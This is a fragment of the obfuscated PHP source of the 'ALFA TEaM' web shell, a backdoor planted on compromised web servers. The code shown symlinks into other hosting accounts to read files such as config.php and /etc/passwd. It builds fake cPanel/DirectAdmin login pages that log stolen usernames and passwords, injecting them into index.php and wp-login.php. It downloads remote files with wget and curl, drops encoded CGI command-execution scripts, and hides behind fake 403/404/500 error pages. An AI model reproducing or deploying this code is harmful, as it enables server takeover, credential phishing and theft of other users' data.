"pysymlink.alfa"; $source = $py; $lang = "python"; } @__write_file($cginame, $source); @chmod($cginame, 493); echo __pre(); $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true); if (strlen($resource) == 0) { echo AlfaiFrameCreator("cgialfa/" . $cginame); } else { echo $resource; } } if (isset($_POST["alfa4"]) && $_POST["alfa4"] == "SymFile") { if (function_exists("symlink") || _alfa_can_runCommand(true, true)) { AlfaNum(9, 10); echo __pre() . "\xa<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g('symlink',null,null,null,null,'SymFile',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>\xa<p><input type="submit" value=" " name="symlink" /></p></form></center>"; $path = $_POST["alfa5"]; $symname = $_POST["alfa6"]; $solevisible58 = $_POST["alfa7"]; if ($solevisible58) { $new_name = str_replace(".", "_", basename($symname)); $rand_dir = $new_name . rand(111, 9999); $sym_dir = "alfasymlinkphp/" . $rand_dir . "/"; @mkdir($sym_dir, 511, true); alfacgihtaccess("sym", $sym_dir, $symname); _alfa_symlink("{$path}", "{$sym_dir}/{$symname}"); echo __pre(); echo "<center><b><font color="white">Click >> </font><a target="_blank" href="" . __ALFA_DATA_FOLDER__ . "/" . $sym_dir . "" ><b><font size="4">" . $symname . "</font></b></a></b></center>"; } } else { echo "<center><pre class=ml1 style='margin-top:5px'><b><font color="#FFFFFF">[+] Symlink Function Disabled !</b></font></pre></center>"; } } if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "symphp") { $cant_symlink = true; if (function_exists("symlink") || _alfa_can_runCommand(false, false)) { @mkdir("alfasymlink", 511); alfacgihtaccess("sym", "alfasymlink/"); _alfa_symlink("/", "alfasymlink/root"); $table_header = "<pre id="strOutput" style="margin-top:5px" class="ml1"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>"; if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")) { echo "<center>"; $lines = array(); $anony_domains = array(); $anonymous_users = array(); $f_black = array(); $error = false; $anonymous = false; $makepwd = "/home/{user}/public_html/"; $domains = alfaGetDomains(); $lines = $domains["lines"]; $state = $domains["state"]; $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner"); $can_runcmd = _alfa_can_runCommand(false, false); if (!$is_posix && !$can_runcmd) { $anonymous = true; $anony_domains = $domains["lines"]; $lines = _alfa_file("/etc/passwd"); } echo $table_header; $count = 1; $template = "<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="" . __ALFA_DATA_FOLDER__ . "/alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>"; foreach ($lines as $line) { $domain = ''; $owner = ''; if ($anonymous) { $explode = explode(":", $line); $owner = $explode[0]; $owner_len = strlen($owner) - 1; $userid = $explode[2]; if ((int) $userid < 500) { continue; } $domain = "[?????]"; $temp_black = array(); $finded = false; foreach ($anony_domains as $anony) { if ($state == "named.conf") { if (@strstr($anony, "zone")) { preg_match_all("#zone "(.*)"#", $anony, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "named" || $state == "valiases") { if ($anony == "." || $anony == "..") { continue; } if ($state == "named") { $anony = rtrim($anony, ".db"); } $domain = $anony; } $sub_domain = str_replace(array("-", "."), '', $domain); if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) { if (in_array($owner . $domain, $temp_black)) { continue; } $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://" . $domain; echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $temp_black[] = $owner . $domain; $finded = true; } } if (!$finded) { $anonymous_users[] = $owner; } } else { if ($state == "named.conf") { if (@strstr($line, "zone")) { preg_match_all("#zone "(.*)"#", $line, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "named" || $state == "valiases") { if ($line == "." || $line == "..") { continue; } if ($state == "named") { $line = rtrim($line, ".db"); } $domain = $line; } if (strlen(trim($domain)) > 2 && $state != "passwd") { if (!_alfa_file_exists("/etc/valiases/" . $domain, false)) { continue; } if ($is_posix) { $user = @posix_getpwuid(@fileowner("/etc/valiases/" . $domain)); $owner = $user["name"]; } elseif ($can_runcmd) { $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false); } } } if (!$anonymous) { if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) { continue; } $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://" . $domain; if ($state == "passwd") { $http = "javascript:alert('we cant find domain...')"; } echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $f_black[] = $owner . $domain; } } if ($anonymous) { foreach ($anonymous_users as $owner) { $sympath = str_replace("{user}", $owner, $makepwd); $http = "javascript:alert('we cant find domain...')"; echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template); $count++; } } $cant_symlink = false; } else { $is_direct = false; $makepwd = alfaMakePwd(); if (_alfa_file_exists("/etc/virtual/domainowners")) { $makepwd = "/home/{user}/public_html"; $is_direct = true; } $sole = _alfa_file("/etc/virtual/domainowners"); $count = 1; echo $table_header; $template = "<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="" . __ALFA_DATA_FOLDER__ . "/alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>"; if ($sole) { foreach ($sole as $visible) { if (@strstr($visible, ":")) { $solevisible = explode(":", $visible); $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd); echo str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template); } } } else { $passwd = _alfa_file("/etc/passwd"); if ($passwd) { $html = ''; $is_named = false; $users = array(); $domains = array(); $uknowns = array(); foreach ($passwd as $user) { $user = trim($user); $expl = explode(":", $user); if ((int) $expl[2] < 500) { continue; } $users[$expl[0]] = $expl[5]; } $site_domains = @scandir("/etc/virtual/"); if (!$site_domains) { $site_domains = alfaEx("ls /etc/virtual/"); $site_domains = explode("\xa", $site_domains); if (!$site_domains) { $site_domains = _alfa_file("/etc/named.conf"); if ($site_domains) { $is_named = true; } } } foreach ($site_domains as $line) { if ($is_named) { if (@strstr($line, "zone")) { preg_match_all("#zone "(.*)"#", $line, $data); $domain = $data[1][0]; if (strlen($domain > 2) && !empty($domain)) { $domains[] = $domain; } } } else { $domains[] = $line; } } $x = 1; foreach ($users as $user => $home) { foreach ($domains as $domain) { $user_len = strlen($user) - 1; $sub_domain = str_replace(array("-", "."), '', $domain); $five_user = substr($user, 0, $user_len); $five_domain = substr($sub_domain, 0, $user_len); if ($five_user == $five_domain) { if ($is_direct) { $cwd = str_replace("{user}", $user, $makepwd); } else { $expl = explode("}/", $makepwd); $cwd = $home . "/" . $expl[1]; } $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template); } else { $uknowns[$user] = $home; } } } $uknowns = array_unique($uknowns); foreach ($uknowns as $user => $home) { if ($is_direct) { $cwd = str_replace("{user}", $user, $makepwd); } else { $expl = explode("}/", $makepwd); $cwd = $home . "/" . $expl[1]; } $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template); } echo $html; } } echo "</table>"; $cant_symlink = false; } } else { echo "<pre class=ml1 style='margin-top:5px'><b><font color="#FFFFFF">[+] Symlink Function Disabled !</b></font></pre></center>"; $cant_symlink = false; } if ($cant_symlink) { echo "<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>"; } echo "</center></table>"; } echo "</div>"; alfafooter(); } goto GzfHC; ZNK2s: function alfadoActions() { $chdir_fals = false; if (!@chdir($_POST["c"])) { $chdir_fals = true; $alfa_canruncmd = _alfa_can_runCommand(true, true); } if (isset($_POST["alfa1"])) { $_POST["alfa1"] = rawurldecode($_POST["alfa1"]); } if (isset($_POST["alfa2"])) { $_POST["alfa2"] = rawurldecode($_POST["alfa2"]); } $action = $_POST["alfa3"]; if ($action == "permission") { $perms = 0; $perm = $_POST["alfa2"]; for ($i = strlen($perm) - 1; $i >= 0; --$i) { $perms += (int) $perm[$i] * pow(8, strlen($perm) - $i - 1); } if (@chmod($_POST["alfa1"], $perms)) { echo "done"; } else { echo "no"; } return; } if ($action == "rename" || $action == "move") { $alfa1_decoded = $_POST["alfa1"]; if ($chdir_fals) { $_POST["alfa1"] = $_POST["c"] . "/" . $_POST["alfa1"]; } $_POST["alfa1"] = trim($_POST["alfa1"]); $alfa1_escape = addslashes($_POST["alfa1"]); if ($_POST["alfa3"] == "rename") { $_POST["alfa2"] = basename($_POST["alfa2"]); } if (!empty($_POST["alfa2"])) { $cmd_rename = false; if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["alfa1"])) { $cmd_rename = true; $alfa1_escape = addslashes($alfa1_decoded); alfaEx("cd '" . addslashes($_POST["c"]) . "';mv '" . $alfa1_escape . "' '" . addslashes($_POST["alfa2"]) . "'"); } } if (!file_exists($_POST["alfa2"])) { if (@rename($_POST["alfa1"], $_POST["alfa2"]) || $cmd_rename) { echo "done"; } else { echo "no"; } } else { echo "no"; } } } elseif ($action == "copy") { if (is_dir($_POST["alfa1"])) { $dir = str_replace("//", "/", $_POST["alfa1"]); $dir = explode("/", $dir); if (empty($dir[count($dir) - 1])) { $name = $dir[count($dir) - 2]; } else { $name = $dir[count($dir) - 1]; } } else { $name = basename($_POST["alfa1"]); } $dir = dirname($_POST["alfa1"]); if ($dir == ".") { $dir = $_POST["c"] . "/"; } if (is_file($_POST["alfa1"])) { @copy($_POST["alfa1"], $_POST["alfa2"]); echo "done"; } elseif (is_dir($_POST["alfa1"])) { if (!is_dir($_POST["alfa2"])) { mkdir($_POST["alfa2"], 493, true); } copy_paste($dir, $name, $_POST["alfa2"] . "/"); echo "done"; } } elseif ($action == "modify") { if (!empty($_POST["alfa1"])) { $time = strtotime($_POST["alfa1"]); if ($time) { $touched = false; if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '" . addslashes($_POST["c"]) . "';touch -d '" . htmlspecialchars(addslashes($_POST["alfa1"])) . "' '" . addslashes($_POST["alfa2"]) . "'"); $touched = true; } if (!@touch($_POST["alfa2"], $time, $time) && !$touched) { echo "no"; } else { echo "ok"; } } else { echo "badtime"; } } } } goto LsgNQ; ldnR5: function convertBash($code) { $dictionary = array("[01;30m" => "<span style="color:black">", "[01;31m" => "<span style="color:red">", "[01;32m" => "<span style="color:green">", "[01;33m" => "<span style="color:yellow">", "[01;34m" => "<span style="color:blue">", "[01;35m" => "<span style="color:purple">", "[01;36m" => "<span style="color:cyan">", "[01;37m" => "<span style="color:white">", "[0m" => "</span>"); $htmlString = str_replace(array_keys($dictionary), $dictionary, $code); return $htmlString; } goto ZNK2s; vH5gS: $hex = "[email protected], [email protected]"; goto ulFiJ; rrdVW: foreach ($_POST as $key => $value) { if (is_array($_POST[$key])) { $i = 0; foreach ($_POST[$key] as $f) { $f = trim(str_replace(" ", "+", $f)); $_POST[$key][$i] = decrypt_post($f); $i++; } } else { $value = trim(str_replace(" ", "+", $value)); $_POST[$key] = decrypt_post($value); } } goto DwLPi; QjYKO: define("__ALFA_POST_ENCRYPTION__", isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false); goto GF8GE; F8Vk4: @session_write_close(); goto TLuCO; SbgNO: $GLOBALS["glob_chdir_false"] = false; goto Qm0Jb; zHgw5: function alfafakepage() { alfahead(); AlfaNum(9, 10); echo "<div class=header><br>
\x9<center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g('fakepage',null,this.clone_page.value,this.fake_root.value,'>>',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method='post'>
	<div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">"; $cm_array = array("cpanel" => "Cpanel", "directadmin" => "DirectAdmin"); foreach ($cm_array as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } echo "</select></div>"; echo "<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
	<div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="" . $_SERVER["DOCUMENT_ROOT"] . "/fake_page_root/"></div>\xa	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="" . $_SERVER["DOCUMENT_ROOT"] . "/index.php"></div>\xa	<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: " . $_SERVER["DOCUMENT_ROOT"] . "/wp-login.php"></div>\xa\x9<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="" . $GLOBALS["cwd"] . "logs.txt"></div>
\x9<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>\xa	<div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>"; $clone_page = $_POST["alfa1"]; $fake_root = $_POST["alfa2"]; $logto = $_POST["alfa4"]; $panel = $_POST["alfa5"]; $inject_to = $_POST["alfa6"]; $bind_on = $_POST["alfa7"]; $count = $_POST["alfa8"]; if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST["alfa3"] == ">>") { echo __pre(); $target = $clone_page; $curl = new AlfaCURL(); $source_page = $curl->Send($target); if (!empty($source_page)) { $matched_form = ''; if ($panel == "cpanel") { if (preg_match("#<form(.*)id="login_form"(.*)>#", $source_page, $match)) { $matched_form = $match[0]; } } else { if (preg_match("#<form(.*?)>#", $source_page, $match)) { $matched_form = $match[0]; } } if (!empty($matched_form)) { $fake = ''; $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root); $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to); if ($panel == "cpanel") { $port = "2083"; } else { $target = str_replace(array("http://", "https://"), '', $target); $port = explode(":", $target); $port = $port[1]; } if (substr($uri, 0, 1) == "/") { $uri = substr($uri, 1); } $uri = $_SERVER["HTTP_ORIGIN"] . "/" . str_replace("index.php", '', $uri) . "?:" . $port; $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . "/log.php"; if ($panel == "cpanel") { $form = "<form novalidate id="login_form" action="" . $log_url . "" method="post" target="_top" style="visibility:">"; } else { $form = "<form action="" . $log_url . "" method="post">"; } $fake = str_replace($matched_form, $form, $source_page); if (@(!is_dir($fake_root))) { @mkdir($fake_root, 511, true); } $cookie_name = "alfa_fakepage_counter" . rand(9999, 99999); $post_user = "user"; $post_pass = "pass"; $resp_code = "if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}"; if ($panel != "cpanel") { $post_user = "username"; $post_pass = "password"; $resp_code = "@header("Location: ".$_SERVER['HTTP_REFERER']);"; } $cpanel_log = "<?php $cook_time = time()+(86400 * 7); $user = $_POST["" . $post_user . ""];$pass = $_POST["" . $post_pass . ""];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["" . $cookie_name . ""])){@setcookie("" . $cookie_name . "", 0, $cook_time, "/");$_COOKIE["" . $cookie_name . ""]=1;}if((int)$_COOKIE["" . $cookie_name . ""]>" . $count . "){@header("Location: /");exit;}@setcookie("" . $cookie_name . "", ((int)$_COOKIE["" . $cookie_name . ""] + 1), $cook_time, "/");$fp = @fopen("" . $logto . "", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);" . $resp_code . "exit;}?>"; @file_put_contents($fake_root . "/log.php", $cpanel_log); if ($panel == "cpanel") { $fake = preg_replace(array("#<link(.*)href="(.*)"(.*)>#", "#<img class="main-logo" src="(.*)"(.*)>#", "# <a(.*)id="reset_password">#"), array("<link href="" . $target . "/$2">", "<img class="main-logo" src="" . $target . "/$1" alt="logo" />", "<a href="#" id="reset_password">"), $fake); } @file_put_contents($fake_root . "/index.php", $fake); $inject_code = "<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["" . $cookie_name . ""]<" . $count . "){@include("" . $fake_root . "/index.php");exit;}?>"; $bind_on_code = "<?php if((int)$_COOKIE["" . $cookie_name . ""]<" . $count . "){@header("Location: " . $uri . "");exit;}?>"; @file_put_contents($inject_to, $inject_code . "\xa" . @file_get_contents($inject_to)); @file_put_contents($bind_on, $bind_on_code . "
" . @file_get_contents($bind_on)); echo "success...!"; } else { echo "failed...!"; } } else { echo "<div style='text-align:center;color:red;'>Cannot open the target...!</div>"; } } echo "</div>"; alfafooter(); } goto VBrHH; EoAWA: function __get_resource($content) { return @gzinflate(__ZGVjb2Rlcg($content)); } goto Ze0OK; vrpxi: @ini_set("memory_limit", "-1"); goto JisW0; W1P0Y: $psDEwGhsxg = "gz" . "inf" . "late"; goto It5ls; JisW0: @ini_set("upload_max_filesize", "9999m"); goto hD7du; nhViU: @error_reporting(E_ALL ^ E_NOTICE); goto u4yR4; hD7du: if ($config["AlfaProtectShell"]) { $SERVER_SIG = isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : ''; $Eform = "<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>"; if ($config["AlfaLoginPage"] == "gui") { if (@$_COOKIE["AlfaUser"] != $config["AlfaUser"] && $_COOKIE["AlfaPass"] != md5($config["AlfaPass"])) { if (@$_POST["usrname"] == $config["AlfaUser"] && @md5($_POST["password"]) == $config["AlfaPass"]) { __alfa_set_cookie("AlfaUser", $config["AlfaUser"]); __alfa_set_cookie("AlfaPass", @md5($config["AlfaPass"])); @header("location: " . $_SERVER["PHP_SELF"]); } echo "
<style>\xabody{background: black;}
#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
#loginbox td { border-radius:5px; font-size:11px; }
</style>\xa<title>~ ALFA TEaM Shell-v" . __ALFA_VERSION__ . "-" . __ALFA_CODE_NAME__ . " ~</title><center>
<center><img style="border-radius:100px;" width="500" height="250" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></center>
<div id=loginbox><p><font face="verdana,arial" size=-1>
<center><table cellpadding='2' cellspacing='0' border='0' id='ap_table'>
<tr><td bgcolor="green"><table cellpadding='0' cellspacing='0' border='0' width='100%'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v" . __ALFA_VERSION__ . "-" . __ALFA_CODE_NAME__ . " ~</b></font></th></tr>\xa<tr><td bgcolor="black" style="padding:5">\xa<form method="post">\xa<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">\xa<center><table>\xa<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == 'username'){this.value = '';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == 'password') this.value = '';"></td></tr>
<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>\xa</div><br /></center>"; die; } } elseif ($config["AlfaLoginPage"] == "500") { if (@$_COOKIE["AlfaPass"] != @md5($config["AlfaPass"])) { if (@md5($_POST["password"]) == $config["AlfaPass"]) { __alfa_set_cookie("AlfaUser", $config["AlfaUser"]); __alfa_set_cookie("AlfaPass", @md5($config["AlfaPass"])); @header("location: " . $_SERVER["PHP_SELF"]); } echo "<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, " . $_SERVER["SERVER_ADMIN"] . " and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform; die; } } elseif ($config["AlfaLoginPage"] == "403") { if (@$_COOKIE["AlfaPass"] != @md5($config["AlfaPass"])) { if (@md5($_POST["password"]) == $config["AlfaPass"]) { __alfa_set_cookie("AlfaUser", $config["AlfaUser"]); __alfa_set_cookie("AlfaPass", @md5($config["AlfaPass"])); @header("location: " . $_SERVER["PHP_SELF"]); } echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER["PHP_SELF"] . " on this server.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform; die; } } elseif ($config["AlfaLoginPage"] == "404") { if (@$_COOKIE["AlfaPass"] != @md5($config["AlfaPass"])) { if (@md5($_POST["password"]) == $config["AlfaPass"]) { __alfa_set_cookie("AlfaUser", $config["AlfaUser"]); __alfa_set_cookie("AlfaPass", @md5($config["AlfaPass"])); @header("location: " . $_SERVER["PHP_SELF"]); } echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL " . $_SERVER["PHP_SELF"] . " was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform; die; } } } goto l9Nci; jPDeP: function __download($url, $path = false) { if (!preg_match("/[a-z]+:\/\/.+/", $url)) { return false; } $saveas = basename(rawurldecode($url)); if ($path) { $saveas = $path . $saveas; } if ($content = __read_file($url)) { if (@is_file($saveas)) { @unlink($saveas); } if (__write_file($saveas, $content)) { return true; } } $buff = alfaEx("wget " . $url . " -O " . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("curl " . $url . " -o " . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("lwp-download " . $url . " " . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("lynx -source " . $url . " > " . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("GET " . $url . " > " . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("links -source " . $url . " > " . $saveas); if (@is_file($saveas)) { return true; } $buff = alfaEx("fetch -o " . $saveas . " -p " . $url); if (@is_file($saveas)) { return true; } return false; } goto gNx00; uKA69: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $GLOBALS["sys"] = "win"; } else { $GLOBALS["sys"] = "unix"; } goto rvAhm; e_ypN: function _alfa_cgicmd($cmd, $lang = "perl", $set_cookie = false) { if (!$GLOBALS["DB_NAME"]["cgi_api"]) { return ''; } if (isset($_COOKIE["alfacgiapi_mode"])) { return ''; } $cmd_pure = $cmd; $is_curl = function_exists("curl_version"); $is_socket = function_exists("fsockopen"); if ($is_curl || $is_socket) { $recreate = false; if (isset($_COOKIE["alfacgiapi"])) { if (!@file_exists("alfacgiapi/" . $_COOKIE["alfacgiapi"] . ".alfa")) { $recreate = true; $lang = $_COOKIE["alfacgiapi"]; } } if (!isset($_COOKIE["alfacgiapi"]) || $recreate) { @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); $perl = "jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM="; $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI="; $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C"; $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw=="; if ($lang == "perl") { $source = $perl; } elseif ($lang == "py") { $source = $py; } else { $source = $bash; } if ($lang == "aspx") { alfaWriteTocgiapi("aspx.aspx", $aspx); } else { alfaWriteTocgiapi($lang . ".alfa", $source); } alfacgihtaccess("cgi", "alfacgiapi/"); } else { $lang = $_COOKIE["alfacgiapi"]; } $cgi_ext = ".alfa"; if ($lang == "aspx") { $cgi_ext = ".aspx"; } $cgi_url = __ALFA_DATA_FOLDER__ . "/alfacgiapi/" . $lang . $cgi_ext; $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS["cwd"] . ";" . $cmd); if ($is_curl) { $address = ($_SERVER["SERVER_PORT"] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/" . $cgi_url; $post = new AlfaCURL(); $data = $post->Send($address, "post", $cmd); } elseif ($is_socket) { $server = $_SERVER["SERVER_NAME"]; $uri = dirname($_SERVER["REQUEST_URI"]) . "/" . $cgi_url; $data = _alfa_fsockopen($server, $uri, $cmd); } $out = ''; if (strpos($data, "[solevisible~api]") !== false && strpos($data, "[solevisible~api]<pre>"+output+"</pre>") === false) { if ($set_cookie) { 